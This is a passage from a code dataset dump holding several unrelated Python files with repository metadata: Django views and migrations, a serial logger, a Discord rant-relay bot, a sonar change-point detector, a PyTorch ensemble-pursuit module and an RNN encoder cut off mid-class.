1dce939f95f133209f32569b9e8b6b0702554575 | f5d1e8b54ddbc51a9ef1b868eee93096d9b0fbeb | /weapp/termite2/activate_wepage_mechanism.py | 241e34812fed2fa1777746f08e55f3f0616b0d9e | [] | no_license | chengdg/weizoom | 97740c121724fae582b10cdbe0ce227a1f065ece | 8b2f7befe92841bcc35e0e60cac5958ef3f3af54 | refs/heads/master | 2021-01-22T20:29:30.297059 | 2017-03-30T08:39:25 | 2017-03-30T08:39:25 | 85,268,003 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # -*- coding: utf-8 -*-
import json
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.db.models import F
from django.contrib.auth.decorators import login_required
from account import models as account_models
from core import resource
from core.jsonresponse import create_response
from webapp import models as webapp_models
class ActivateWepageMechanism(resource.Resource):
app = 'termite2'
resource = 'activate_wepage_mechanism'
@login_required
def api_put(request):
"""
激活wepage机制
"""
account_models.UserProfile.objects.filter(user_id=request.user.id).update(is_use_wepage=True)
response = create_response(200)
return response.get_response()
| [
"gaoliqi@weizoom.com"
] | gaoliqi@weizoom.com |
6366520696258a461f3115d86f78471be03fe8ae | 7c3a2a44536779d711349f38a18c0edd95ff5b1f | /algolia_places/__init__.py | 7b9dcb29453e2ba317b160934479cabb2fbb81ee | [
"MIT"
] | permissive | m-vdb/algolia-places-python | f0c566d5801a9397406cce32bbc8593da85cf769 | 84fcbf93abf35ad4c42ade0415fdafa2674639f7 | refs/heads/master | 2021-07-11T13:38:00.898814 | 2018-08-20T12:54:11 | 2018-08-20T12:54:11 | 145,402,115 | 2 | 1 | MIT | 2020-06-16T07:53:03 | 2018-08-20T10:20:15 | Python | UTF-8 | Python | false | false | 69 | py | """Algolia places module."""
from .client import AlgoliaPlacesClient
| [
"mvergerdelbove@work4labs.com"
] | mvergerdelbove@work4labs.com |
d12c93622232f347d20dbadc382905388fd5a03c | e9354fa4fda49b91509695f9237a873885199691 | /Main/migrations/0006_mask_likes.py | 398006c63d9cc301c31c8befe836d38a0e149eef | [] | no_license | DreamTeamInc/Core-backend | ccb89a66a0abe4ede1a6623441a26865e9a1f539 | 63801d1de0b39f678b7cb37514730c8203b227c2 | refs/heads/master | 2023-01-13T23:51:25.302887 | 2020-11-26T18:05:33 | 2020-11-26T18:05:33 | 299,843,151 | 0 | 0 | null | 2020-11-21T06:49:48 | 2020-09-30T07:34:03 | Python | UTF-8 | Python | false | false | 426 | py | # Generated by Django 3.1.2 on 2020-10-22 12:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Main', '0005_auto_20201019_1918'),
]
operations = [
migrations.AddField(
model_name='mask',
name='likes',
field=models.PositiveSmallIntegerField(default=0),
preserve_default=False,
),
]
| [
"4eckah78"
] | 4eckah78 |
0f80f690d3b8d2483d815eb3d69a1cac19cee35e | e7a6d5073b6ab13c33148033053e8a6e8a67d36d | /linux/kernel/interogate_smaps.py | f422248fcdeea601b6144f448a913f2628635083 | [
"Apache-2.0"
] | permissive | Oneiroi/sysadmin | 39de72a5d788070219e8dc171e0cba27334c2fa1 | 23429993c61be124ce445f219f835ce3659d99ee | refs/heads/master | 2023-03-21T18:34:50.716777 | 2023-03-07T16:56:39 | 2023-03-07T16:56:39 | 1,074,593 | 31 | 18 | null | 2018-04-16T09:49:50 | 2010-11-12T13:13:25 | Python | UTF-8 | Python | false | false | 500 | py | #!/usr/bin/env python
import glob
def main():
template = '{0:10}'
for i in xrange(1,14):
template += '{%d:15}' %i
print template.format(
'Process',
'Size',
'Rss',
'Pss',
'Shared_Clean',
'Shared_Dirty',
'Private_Clean',
'Private_Dirty',
'Referenced',
'Anonymous',
'AnonHugePages',
'Swap',
'KernelPageSize',
'MMUPageSize')
smaps = glob.glob('/proc/[0-9]*/smaps')
if __name__ == '__main__':
main()
| [
"oneiroi@fedoraproject.org"
] | oneiroi@fedoraproject.org |
ecfd2884da65ec11224cd11006ffbfd7b1f9157c | b375432011b9abe6bd60a6dd7bd538f7044d9f59 | /LoRa Python Files/Node 1/RX_Logging_Code (00224D6A3DEB's conflicted copy 2019-03-28).py | ecf247064170c364f72683a32647a7770217ccba | [] | no_license | opus-meum/MSc-Project | bffc964aa1258fbac486283f3579f18b0fb2dad7 | dd9fadfd5e1980a56a3370e13b3d4da26feb6108 | refs/heads/master | 2022-01-10T03:33:48.746858 | 2019-06-27T14:20:43 | 2019-06-27T14:20:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | """"
Experiment Test: RX Logger Code
Node 1
By Kossivi Fangbemi
"""
import time
import serial
serial_com4 = serial.Serial("COM11", 9600, timeout= 0.30)
try:
Text_File = open('RX_Logger_File', 'a')
"""Text_File.write('Nth Data sent \t || \t TX Power dBm \t || \t Acknowledgment \t || \t RSSI dBm \t\t || \t SRN || \n\r')
"""
print('RX_Logger_File opened')
except Exception, e1:
print 'Error in openning TX_Logger_File' + str(e1)
exit()
try:
serial_com4.open
except Exception, e:
print 'Error in openning Serial Port' + str(e)
exit()
if serial_com4.isOpen():
try:
serial_com4.flushInput()
serial_com4.flushOutput()
time.sleep(0.001)
while True:
Text_File = open('RX_Logger_File', 'a')
Response = serial_com4.read(150)
if Response != '':
print(Response)
Text_File.write(Response)
time.sleep(0.002)
Text_File.close()
#serial_com5.flushInput()
#serial_com5.flushOutput()
#break
serial_com4.close()
Text_File.close()
except Exception, ee:
print("Serial Communication Error: " + str(ee))
else:
print("<<<-- Serial Port Com Not Opened -->>>")
| [
"kossiviagbe@gmail.com"
] | kossiviagbe@gmail.com |
5304fa765d4927fd4cefa8bd7af24bd149b98a00 | e9c882a52ba0e5ee250a1e42cbc79d68b919213a | /comparingExcel.py | 02ab5dfc9381455fb1a8de328b4a0214d2a3465d | [] | no_license | malikatahseen/swmsed | 438015c61bff16e73b06fec0c6a837b9bf52848b | 8a2aaee46594b632242c269fffd2f6095d8c2a78 | refs/heads/main | 2023-08-24T20:13:10.267463 | 2021-09-16T08:51:24 | 2021-09-16T08:51:24 | 407,089,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import pandas as pd
from pandas import ExcelWriter
df = pd.read_excel(r'C:\Users\MALIKA\Desktop\mapping file.xlsx')
result = df[df['Prod.ERP.Name'].isin(list(df['STATUS'])) & df['Prod.GOV.Name'].isin(list(df['STATUS']))]
print(result)
writer = ExcelWriter('result.xlsx')
result.to_excel(writer,'Sheet1',index=False)
writer.save() | [
"noreply@github.com"
] | noreply@github.com |
c5b7c0831380a9b4fd9effc5cea7908430770144 | 92f6ffb240a1fbaa52ae23f614663b2b915e4187 | /backend/home/migrations/0002_load_initial_data.py | 79e2423fce37abb55ff579976a85fe906d1c2f41 | [] | no_license | crowdbotics-apps/msgs-sghsg56-dev-12782 | 3b196351f5ff932916802912c7740c7455a78459 | 10f95c9e897dcad50e21950879adc97b9fe689f4 | refs/heads/master | 2022-12-24T00:35:35.056481 | 2020-10-06T09:11:48 | 2020-10-06T09:11:48 | 301,672,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "MSGS-sghsg56"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">MSGS-sghsg56</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "msgs-sghsg56-dev-12782.botics.co"
site_params = {
"name": "MSGS-sghsg56",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
41d57f34fb18db0a6f660a6cf4b40fb9024e33f3 | f78572ce42d800147396308943e346d32c011601 | /sss_object_detection/src/sss_object_detection/cpd_detector.py | efef436d1f39f36e35a4edb04395e075f6082aac | [
"BSD-3-Clause"
] | permissive | ShounakCy/smarc_perception | 83f579bb4fe1aa4b6b19f261f8f547ec81d4c2dd | 37de967be6246dbfd588608d7cbf77112c785ed3 | refs/heads/noetic-devel | 2023-08-18T19:41:46.019355 | 2021-10-14T12:15:21 | 2021-10-14T12:15:21 | 408,851,791 | 0 | 0 | BSD-3-Clause | 2021-09-21T14:25:51 | 2021-09-21T14:25:48 | null | UTF-8 | Python | false | false | 4,321 | py | import numpy as np
import ruptures as rpt
from sss_object_detection.consts import ObjectID
class CPDetector:
"""Change point detector using window sliding for segmentation"""
def __init__(self):
self.buoy_width = 15
self.min_mean_diff_ratio = 1.5
def detect(self, ping):
"""Detection returns a dictionary with key being ObjectID and
value being a dictionary of position and confidence of the
detection."""
detections = {}
nadir_idx = self._detect_nadir(ping)
# rope = self._detect_rope(ping, nadir_idx)
buoy = self._detect_buoy(ping, nadir_idx)
# detections[ObjectID.NADIR] = {'pos': nadir_idx, 'confidence': .9}
# if rope:
# detections[ObjectID.ROPE] = {
# 'pos': rope[0][0],
# 'confidence': rope[1]
# }
if buoy:
detections[ObjectID.BUOY] = {
'pos': buoy[0][0],
'confidence': buoy[1]
}
return detections
def _compare_region_with_surrounding(self, ping, bkps, window_size=50):
region_mean = np.mean(ping[bkps[0]:bkps[1]])
prev_window = ping[max(bkps[0] - window_size, 0):bkps[0]]
post_window = ping[bkps[1] + 1:min(bkps[1] +
window_size, ping.shape[0])]
surrounding_mean = (np.mean(prev_window) + np.mean(post_window)) / 2
return region_mean / surrounding_mean
def _detect_rope(self, ping, nadir_idx):
"""Given the tentative nadir_annotation, provide tentative rope
annotation by segmenting the nadir region. Return None if the
break point detected is unlikely to be a rope."""
bkps = self._window_sliding_segmentation(ping=ping,
start_idx=40,
end_idx=nadir_idx,
width=4,
n_bkps=1)
bkps = [bkps[0] - 1, bkps[0] + 1]
mean_diff_ratio = self._compare_region_with_surrounding(ping, bkps)
if mean_diff_ratio < self.min_mean_diff_ratio:
return None
confidence = 1 / mean_diff_ratio
return bkps, confidence
def _detect_buoy(self, ping, nadir_idx):
"""Given the tentative nadir_annotation, provide tentative buoy
detection by segmenting the nadir region. Return None if no
buoy detected."""
bkps = self._window_sliding_segmentation(ping=ping,
start_idx=40,
end_idx=nadir_idx,
width=self.buoy_width,
n_bkps=2)
# Check whether the segmentation is likely to be a buoy
if bkps[1] - bkps[0] > self.buoy_width * 2 or bkps[1] - bkps[
0] < self.buoy_width * .5:
return None
mean_diff_ratio = self._compare_region_with_surrounding(ping, bkps)
if mean_diff_ratio < self.min_mean_diff_ratio:
return None
confidence = 1 / mean_diff_ratio
return bkps, confidence
def _detect_nadir(self, ping):
"""Use window sliding segmentation to provide tentative
nadir location annotation. Return detected nadir index."""
bkps = self._window_sliding_segmentation(ping=ping,
n_bkps=1,
start_idx=100,
end_idx=ping.shape[0],
width=100)
return bkps[0]
def _window_sliding_segmentation(self, ping, n_bkps, start_idx, end_idx,
width):
"""Use window sliding method to segment the input numpy array from
start_idx to end_idx into (n_bkps + 1) segments. Return a list of
suggested break points."""
algo = rpt.Window(width=width, model='l2').fit(ping[start_idx:end_idx])
bkps = algo.predict(n_bkps=n_bkps)
bkps = [bkps[i] + start_idx for i in range(len(bkps))]
return bkps
| [
"liling@kth.se"
] | liling@kth.se |
ee455120d07d20db9d326555a538e8ddbf8ba9e1 | 9cd882ab23d9332fc8eef3ae0ce54d786bf73546 | /Anonymous(Alpha).py | cb8f8a756316fcc41d2c32b29d1704b11fefd8a8 | [] | no_license | KennethL27/Anonymous_Bots | 67e6ddd81bfb6df0461a21011b76062f9e02db63 | 4566e55222df0f09ed2497bb5faf0a3939351494 | refs/heads/master | 2023-03-05T15:43:07.068561 | 2021-02-23T19:46:41 | 2021-02-23T19:46:41 | 341,039,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,044 | py | import discord, time
from discord.ext import commands
intents = discord.Intents.default()
intents.guilds = True
intents.members = True
intents.messages = True
client = commands.Bot(command_prefix = '-', intents = intents)
rant_channel_id = 718972914434572402
guild_id = 613512375798333450
gaucho_id = 761355746163163138
@client.event
async def on_ready():
print('Bot is ready')
# User Commands
######################################################################################################################################################
@client.command(aliases=['whine','r','complaint'])
async def rant(ctx,*,rant):
print(f'User: {ctx.author} said: {rant}')
await ctx.channel.purge(limit=1)
await ctx.send(rant)
@client.command()
async def uptime(ctx):
time_seconds = time.perf_counter()
time_days = time_seconds //(86400)
time_seconds = time_seconds % 86400
time_hours = time_seconds // 3600
time_seconds %= 3600
time_minutes = time_seconds // 60
time_seconds %= 60
time_seconds = time_seconds
await ctx.send(f'**UPTIME**: Days: {int(time_days)}, Hours: {int(time_hours)}, Minutes: {int(time_minutes)}, Seconds: {round(time_seconds,2)}')
# DM Feature
######################################################################################################################################################
@client.listen('on_message')
async def on_message(message):
guild = client.get_guild(guild_id)
user_id = message.author.id
usable_member = guild.get_member(user_id)
gaucho_role = guild.get_role(gaucho_id)
usable_member_roles = usable_member.roles
if gaucho_role in usable_member_roles:
if message.channel != client.get_channel(rant_channel_id):
if message.author != client.user:
rant2 = str(message.content)
channel = client.get_channel(rant_channel_id)
print(f'User: {message.author} said: {rant2}')
await channel.send(content = rant2)
client.run('TOKEN') | [
"kenneth.lara01@gmail.com"
] | kenneth.lara01@gmail.com |
22682de8e09ae6b405ad831230b9747b3f8f61ff | a2a99d7b7f82cf1d8ea521682e1b784e94229dca | /mysite/urls.py | e2ed5368aa208170ffb09985edea26d4bd3df57c | [] | no_license | marianjoroge/polls | f96324b17e6e57ac54c9cb21203741b8ef4eb838 | c86194d1e2cac209e554fde4300a1919ab8efa5e | refs/heads/master | 2020-05-26T00:21:06.143018 | 2019-05-22T14:15:17 | 2019-05-22T14:15:17 | 188,050,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^polls/', include('polls.urls')),
url(r'^admin/', admin.site.urls),
url(r'^api/polls', include('polls.api.urls', namespace='api-polls')),
]
| [
"njorogemaria8@gmail.com"
] | njorogemaria8@gmail.com |
62b59c59255156c3b496e9918e56c9b184e0694c | 60abe94f54c64235bed696143fa77acc65c57e51 | /home/urls.py | 7ce0818898e61395aaf5a6b60c7e17c5a8ba1691 | [] | no_license | ncepu-liudong/AXF | 782a752c34d57949c930a5da55c8cd7f5d9a7c6c | 6f3c9cc02928a1d597bf3dcc3b6686815b7dcadf | refs/heads/master | 2022-12-08T13:27:05.796584 | 2020-09-01T12:49:09 | 2020-09-01T12:49:09 | 284,428,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from django.contrib import admin
from django.urls import path, include
from rest_framework.documentation import include_docs_urls
from home import views
app_name = 'home'
urlpatterns = [
path('home/', views.HomeListView.as_view(), name='home'),
] | [
"46965739+ncepu-liudong@users.noreply.github.com"
] | 46965739+ncepu-liudong@users.noreply.github.com |
e9e6013d45c4fcc42b1c9ff3d15d058a13493e6b | 5d8b4f98459c0083b407ab7947e99effe8c2e8d6 | /WorldLeaderClassifier/server/util.py | 7e7a2cd39daa570db4de263c6f113d5c841eb138 | [] | no_license | udayashangar/DataScienceProjects | cdb9959be059653c09e4f8b7be7af93b0fc89f71 | bae18d9edf9d7717fa6397971bc129759f29c7fa | refs/heads/master | 2022-12-04T03:04:22.956357 | 2020-08-21T05:41:04 | 2020-08-21T05:41:04 | 286,650,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,957 | py | import joblib
import json
import numpy as np
import base64
import cv2
import pywt
__class_name_to_number = {}
__class_number_to_name = {}
__model = None
def w2d(img, mode='haar', level=1):
imArray = img
#Datatype conversions
#convert to grayscale
imArray = cv2.cvtColor( imArray,cv2.COLOR_RGB2GRAY )
#convert to float
imArray = np.float32(imArray)
imArray /= 255;
# compute coefficients
coeffs=pywt.wavedec2(imArray, mode, level=level)
#Process Coefficients
coeffs_H=list(coeffs)
coeffs_H[0] *= 0;
# reconstruction
imArray_H=pywt.waverec2(coeffs_H, mode);
imArray_H *= 255;
imArray_H = np.uint8(imArray_H)
return imArray_H
def classify_image(image_base64_data, file_path=None):
imgs = get_cropped_image_if_2_eyes(file_path, image_base64_data)
result = []
for img in imgs:
scalled_raw_img = cv2.resize(img, (32, 32))
img_har = w2d(img, 'db1', 5)
scalled_img_har = cv2.resize(img_har, (32, 32))
combined_img = np.vstack((scalled_raw_img.reshape(32 * 32 * 3, 1), scalled_img_har.reshape(32 * 32, 1)))
len_image_array = 32*32*3 + 32*32
final = combined_img.reshape(1,len_image_array).astype(float)
result.append({
'class': class_number_to_name(__model.predict(final)[0]),
'class_probability': np.around(__model.predict_proba(final)*100,2).tolist()[0],
'class_dictionary': __class_name_to_number
})
return result
def class_number_to_name(class_num):
return __class_number_to_name[class_num]
def load_saved_artifacts():
print("loading saved artifacts...start")
global __class_name_to_number
global __class_number_to_name
with open("./artifacts/class_dictionary.json", "r") as f:
__class_name_to_number = json.load(f)
__class_number_to_name = {v:k for k,v in __class_name_to_number.items()}
global __model
if __model is None:
with open('./artifacts/saved_model.pkl', 'rb') as f:
__model = joblib.load(f)
print("loading saved artifacts...done")
def get_cv2_image_from_base64_string(b64str):
'''
credit: https://stackoverflow.com/questions/33754935/read-a-base-64-encoded-image-from-memory-using-opencv-python-library
:param uri:
:return:
'''
encoded_data = b64str.split(',')[1]
nparr = np.frombuffer(base64.b64decode(encoded_data), np.uint8)
img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
return img
def get_cropped_image_if_2_eyes(image_path, image_base64_data):
face_cascade = cv2.CascadeClassifier('./opencv/haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('./opencv/haarcascades/haarcascade_eye.xml')
if image_path:
img = cv2.imread(image_path)
else:
img = get_cv2_image_from_base64_string(image_base64_data)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
cropped_faces = []
for (x,y,w,h) in faces:
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
if len(eyes) >= 2:
cropped_faces.append(roi_color)
return cropped_faces
def get_b64_test_image_for_modi():
with open("b64.txt") as f:
return f.read()
if __name__ == '__main__':
load_saved_artifacts()
#print(classify_image(get_b64_test_image_for_modi(), None))
print(classify_image(None, "./test_images/DT1.jpg"))
print(classify_image(None, "./test_images/DT2.jpg"))
print(classify_image(None, "./test_images/NM1.jpg"))
print(classify_image(None, "./test_images/NM2.jpg"))
print(classify_image(None, "./test_images/VP1.jpeg"))
print(classify_image(None, "./test_images/VP2.jpeg"))
print(classify_image(None, "./test_images/VP3.jpeg"))
print(classify_image(None, "./test_images/VP4.jpg"))
| [
"udayashangar@gmail.com"
] | udayashangar@gmail.com |
bf1f4be617b6f1f98baea223f73aa9d4cf33687a | 7f324af4359ae41a00391b726d169682ef91f2e7 | /Simulations/EnsemblePursuitSimulations.py | 5dd81bfd8eaeb9a19377113a17514a610b71720b | [] | no_license | MouseLand/kesa-et-al-2019 | e5b7acf7301036a7e2e7c332223cea6ceb50d7db | 6c9752cfd5679451fae10199a451b1939f6681e3 | refs/heads/master | 2020-08-05T03:27:25.091375 | 2019-11-06T00:24:26 | 2019-11-06T00:24:26 | 212,375,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,471 | py | import torch
import numpy as np
class EnsemblePursuitPyTorch():
def __init__(self, n_ensembles, lambd, options_dict):
self.n_ensembles=n_ensembles
self.lambd=lambd
self.options_dict=options_dict
def zscore(self,X):
#Have to transpose X to make torch.sub and div work. Transpose back into
#original shape when done with calculations.
mean_stimuli=X.t().mean(dim=0)
std_stimuli=X.t().std(dim=0)+1e-10
X=torch.sub(X.t(),mean_stimuli)
X=X.div(std_stimuli)
return X.t()
def calculate_cost_delta(self,C_summed,current_v):
cost_delta=torch.clamp(C_summed,min=0,max=None)**2/(self.sz[1]*((current_v**2).sum()))-self.lambd
return cost_delta
def mask_cost_delta(self,selected_neurons,cost_delta):
mask=torch.zeros([selected_neurons.size()[0]]).type(torch.cuda.FloatTensor)
mask[selected_neurons==0]=1
mask[selected_neurons!=0]=0
masked_cost_delta=mask*cost_delta
return masked_cost_delta
def sum_C(self,C_summed_unnorm,C,max_delta_neuron):
C_summed_unnorm=C_summed_unnorm+C[:,max_delta_neuron]
return C_summed_unnorm
def sum_v(self, v, max_delta_neuron, X):
current_v=v+X[max_delta_neuron,:]
return current_v
def fit_one_ensemble(self,X):
C=X@X.t()
#A parameter to account for how many top neurons we sample from. It starts from 1,
#because we choose the top neuron when possible, e.g. when we can find an ensemble
#that is larger than min ensemble size. If there is no ensemble with the top neuron
#we increase the number of neurons to sample from.
self.n_neurons_for_sampling=1
top_neurons=self.sorting_for_seed(C)
n=0
min_assembly_size=self.options_dict['min_assembly_size']
max_delta_cost=1000
safety_it=0
#A while loop for trying sampling other neurons if the found ensemble size is smaller
#than threshold.
seed=self.sample_seed_neuron(top_neurons)
n=1
selected_neurons=torch.zeros([self.sz[0]]).type(torch.ByteTensor)
selected_neurons[seed]=1
#Seed current_v
current_v=X[seed,:].flatten()
current_v_unnorm=current_v.clone()
#Fake cost to initiate while loop
max_cost_delta=1000
C_summed_unnorm=0
max_delta_neuron=seed
while max_cost_delta>0:
#Add the x corresponding to the max delta neuron to C_sum. Saves computational
#time.
C_summed_unnorm=self.sum_C(C_summed_unnorm,C,max_delta_neuron)
C_summed=(1./n)*C_summed_unnorm
cost_delta=self.calculate_cost_delta(C_summed,current_v)
#invert the 0's and 1's in the array which stores which neurons have already
#been selected into the assembly to use it as a mask
masked_cost_delta=self.mask_cost_delta(selected_neurons,cost_delta)
max_delta_neuron=masked_cost_delta.argmax()
max_cost_delta=masked_cost_delta.max()
if max_delta_cost>0:
selected_neurons[max_delta_neuron]=1
current_v_unnorm= self.sum_v(current_v_unnorm,max_delta_neuron,X)
n+=1
current_v=(1./n)*current_v_unnorm
current_u=torch.zeros((X.size(0),1))
current_u[selected_neurons,0]=torch.clamp(C_summed[selected_neurons].cpu(),min=0,max=None)/(current_v**2).sum()
current_u=current_u.cpu()
current_v=current_v.cpu()
self.U=torch.cat((self.U,current_u.view(X.size(0),1)),1)
self.V=torch.cat((self.V,current_v.view(1,X.size(1))),0)
return current_u, current_v
def sample_seed_neuron(self,top_neurons):
idx=torch.randint(0,self.n_neurons_for_sampling,size=(1,))
top_neurons=top_neurons[self.sz[0]-(self.n_neurons_for_sampling):]
seed=top_neurons[idx[0]].item()
return seed
def sorting_for_seed(self,C):
'''
This function sorts the similarity matrix C to find neurons that are most correlated
to their nr_neurons_to_av neighbors (we average over the neighbors).
'''
nr_neurons_to_av=self.options_dict['seed_neuron_av_nr']
sorted_similarities,_=C.sort(dim=1)
sorted_similarities=sorted_similarities[:,:-1][:,self.sz[0]-nr_neurons_to_av-1:]
average_similarities=sorted_similarities.mean(dim=1)
top_neurons=average_similarities.argsort()
return top_neurons
def fit_transform(self,X):
'''
X-- shape (neurons, timepoints)
'''
torch.manual_seed(7)
X=torch.cuda.FloatTensor(X)
X=self.zscore(X)
self.sz=X.size()
#Initializes U and V with zeros, later these will be discarded.
self.U=torch.zeros((X.size(0),1))
self.V=torch.zeros((1,X.size(1)))
for iteration in range(0,self.n_ensembles):
current_u, current_v=self.fit_one_ensemble(X)
U_V=current_u.reshape(self.sz[0],1)@current_v.reshape(1,self.sz[1])
X=X.cpu()-U_V
X=X.cuda()
print('ensemble nr', iteration)
cost=torch.mean(torch.mul(X,X))
print('cost',cost)
#After fitting arrays discard the zero initialization rows and columns from U and V.
self.U=self.U[:,1:]
self.V=self.V[1:,:]
return self.U,self.V.t()
| [
"maria.kesa@gmail.com"
] | maria.kesa@gmail.com |
51856a03ef40020ac8c9e0586c08bcf06f66111d | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part003471.py | 2cabb575ba5e4c06ee0f115ab7c8fc7bab070e46 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,927 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher16359(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.4.1.0', 1, 1, S(0)), Add)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Add
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher16359._instance is None:
CommutativeMatcher16359._instance = CommutativeMatcher16359()
return CommutativeMatcher16359._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 16358
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.4.1.1.0', S(1))
except ValueError:
pass
else:
pass
# State 16360
if len(subjects) >= 1:
tmp2 = subjects.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.3.1.1.0', tmp2)
except ValueError:
pass
else:
pass
# State 16361
if len(subjects) == 0:
pass
# 0: f*x
yield 0, subst2
subjects.appendleft(tmp2)
if len(subjects) >= 1 and isinstance(subjects[0], Mul):
tmp4 = subjects.popleft()
associative1 = tmp4
associative_type1 = type(tmp4)
subjects5 = deque(tmp4._args)
matcher = CommutativeMatcher16363.get()
tmp6 = subjects5
subjects5 = []
for s in tmp6:
matcher.add_subject(s)
for pattern_index, subst1 in matcher.match(tmp6, subst0):
pass
if pattern_index == 0:
pass
# State 16364
if len(subjects) == 0:
pass
# 0: f*x
yield 0, subst1
subjects.appendleft(tmp4)
return
yield
from .generated_part003472 import *
from matchpy.matching.many_to_one import CommutativeMatcher
from collections import deque
from matchpy.utils import VariableWithCount
from multiset import Multiset | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
c3e9e1cc8cff9dfb3fae569dd6c04fa4f03eb0c9 | b1fbe7460427dbb891d4b1951e43e551e86b1e3b | /arcnlp/torch/nn/encoders/rnn_encoder.py | 650f222a3a14fcc7307c3081e46773c751216295 | [] | no_license | linhx13/arc-nlp | 88a45601e09deb7883ddf4583f6f2f4607fb85d0 | 760cca0d44958fb4011eaa039263575388a858ae | refs/heads/master | 2023-05-04T12:59:21.232168 | 2021-05-18T17:38:28 | 2021-05-18T17:38:28 | 230,442,944 | 1 | 0 | null | 2021-04-17T03:41:42 | 2019-12-27T12:48:02 | Python | UTF-8 | Python | false | false | 3,606 | py | import torch
import torch.nn as nn
from ...nn.utils import get_sequence_lengths
__all__ = ["RNNEncoder", "LSTMEncoder", "GRUEncoder"]
class _RNNBaseEncoder(nn.Module):
def __init__(self, module, return_sequences):
super(_RNNBaseEncoder, self).__init__()
self.module = module
self.return_sequences = return_sequences
@property
def input_dim(self) -> int:
return self.module.input_size
@property
def output_dim(self) -> int:
return self.module.hidden_size * (
2 if self.module.bidirectional else 1
)
def forward(
self,
inputs: torch.Tensor,
mask: torch.BoolTensor = None,
hidden_state: torch.Tensor = None,
) -> torch.Tensor:
if mask is None:
outputs, _ = self.module(inputs, hidden_state)
if self.return_sequences:
return outputs
else:
return outputs[:, -1, :]
total_length = inputs.size(1)
lengths = get_sequence_lengths(mask)
packed_inputs = nn.utils.rnn.pack_padded_sequence(
inputs, lengths.cpu(), batch_first=True, enforce_sorted=False
)
packed_outputs, state = self.module(packed_inputs, hidden_state)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
packed_outputs, batch_first=True, total_length=total_length
)
if self.return_sequences:
return outputs
else:
if isinstance(state, tuple):
state = state[0]
state = state.transpose(0, 1)
num_directions = 2 if self.module.bidirectional else 1
last_state = state[:, -num_directions:, :]
return last_state.contiguous().view([-1, self.output_dim])
class RNNEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
return_sequences: bool = False,
):
module = nn.RNN(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
class LSTMEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
